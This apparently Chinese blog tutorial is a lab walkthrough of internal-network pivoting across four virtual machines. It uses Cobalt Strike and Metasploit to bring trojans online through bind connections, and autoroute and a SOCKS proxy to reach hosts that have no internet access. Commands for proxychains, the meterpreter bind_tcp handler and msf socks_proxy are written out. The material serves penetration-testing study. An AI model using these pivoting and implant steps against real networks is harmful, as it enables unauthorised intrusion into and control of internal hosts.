当前位置:   article > 正文

第124天:内网安全-代理 Sockets协议&路由不出网&后渗透通讯&CS-MSF 控制上线

第124天:内网安全-代理 Sockets协议&路由不出网&后渗透通讯&CS-MSF 控制上线

目录

思维导图

环境配置

案例一:网络通讯&控制上线--CS-路由添加&节点建立&协议生成&正反连接

案例二:网络通讯&控制上线--MSF-路由添加&节点建立&协议生成&正反连接


思维导图

环境配置

这里由于系统内存问题我只设置三台主机,kali充当外网主机

win2019

网卡设置

ip地址

win2008

网卡设置

ip地址

win7网卡设置

ip

确保主机两两之间可以互相ping通

kali  ping  win2019

win2019   ping  win2008

win2008  ping win7

不用来回ping因为ping是相互的,有来有回

案例一:网络通讯&控制上线--CS-路由添加&节点建立&协议生成&正反连接

首先先生成木马在让win2019进行上线

需要设置sockets代理让2019转发一个端口给kali,kali通过代理工具连接这个端口来进行win2008的控制

设置sockets连接

kali设置代理规则,工具为proxychains4为kali自带的,这里是因为我是kali系统,如果是windows,建议使用Proxifier,图形化界面便于操作

工具使用教程

安装完成后,ProxyChains的配置文件通常位于/etc/proxychains.conf或/etc/proxychains4.conf。你需要编辑这个文件来添加你的代理服务器信息。

打开配置文件:

bash

sudo nano /etc/proxychains4.conf  # 假设你安装了proxychains4  
# 或者  

sudo nano /etc/proxychains.conf

    在文件的末尾找到[ProxyList]部分,并添加你的代理服务器信息。格式通常为:

协议类型 代理服务器IP地址 端口号 [用户名 密码]

例如,如果你有一个SOCKS5代理,IP地址为123.123.123.123,端口号为1080,则添加如下行:

socks5 123.123.123.123 1080

如果需要用户名和密码进行身份验证,则添加相应的用户名和密码:

socks5 123.123.123.123 1080 用户名 密码

    保存并关闭配置文件。

三、使用ProxyChains

配置完成后,你就可以通过ProxyChains来使用代理服务器了。ProxyChains的使用非常简单,只需在要运行的命令前加上proxychains4(或proxychains,取决于你安装的版本)即可。

例如,如果你想通过代理服务器访问Google,可以使用curl命令:

bash

proxychains4 curl https://www.google.com

如果没有proxychains4需要自己进行安装,更改/etc/proxychains4.conf文件

因为刚才socket连接为socks4所以这里设置时也需设置为socks4

配置规则

socks4/5 ip 端口

利用 proxychains4 curl win2008IP地址 访问这个地址的网页:启动了phpstudy,可以成功访问了

这里访问页面可以访问成功但是ping不通,个人理解是通过win2019开的口子,能与win2008建立通讯,http不需要建立持久的连接,连接之后返回数据断开即可,通过win2019把数据反回来,而ping虽然数据包可以发送出去,但是在win2008并未设置到kali的路由不知道往哪里发送所以会卡住

现在需要通过cs中2019正向连接win2008因为win2008无法与kali建立连接,只能与win2019连接

操作方法

生成一个新的正向连接的监听器和木马

生成新的后门需要选用加s的模块

上传后门并且执行,因为需要正向连接所以需要win2019输入

connect win2008ip 木马端口

 win2008成功上线

连接win7同样的木马直接上传运行,通过win2008连接

连接完成后拓扑图结构

现在再试一下给通过win2008给kali添加win7的节点路由,以此来访问win7的页面

添加节点

添加代理

访问20.20.20.2(iis)

案例二:网络通讯&控制上线--MSF-路由添加&节点建立&协议生成&正反连接

这里我直接先利用msf全部控制,再弄路由添加建立节点来访问页面

首先生成木马,开启监听

然后执行木马上线win2019

msf虽然也是通过win2019正向连接,但是不是通过2019会话进行的,是通过win2019生成路由,让kali直接用msf进行连接的,

通过win2019添加路由

  1. run autoroute -p
  2. run post/multi/manage/autoroute

把会话放入后台

使用正向连接模块,进行连接,这里端口需设置为lport,不能与会话一端口一致

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/bind_tcp
  3. set rhost 10.10.10.2
  4. set lport 3333
  5. run

生成正向连接木马

上传,msf使用正向连接模块

再以win2008生成路由

把会话放入后台

继续上传刚才的木马进行正向连接

这个时候如果是msf与他建立了完整的连接,如果需要kali主机与他们建立连接,则需要通过socket连接生成节点,通过代理连接这个节点以此访问,代理端口为1111

  1. use auxiliary/server/socks_proxy
  2. set srvhost 0.0.0.0
  3. set srvport 1111
  4. run

配置代理,msf-socks默认为socks5

这里不同于cs的是设置一个节点就可以访问所有可以互相访问的主机

访问win2008,phpstudy

访问win7-iis

如果是windows系统的话可以使用更为方便的图形化工具Proxifier

直接设置代理所有

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/897816
推荐阅读
相关标签
  

闽ICP备14008679号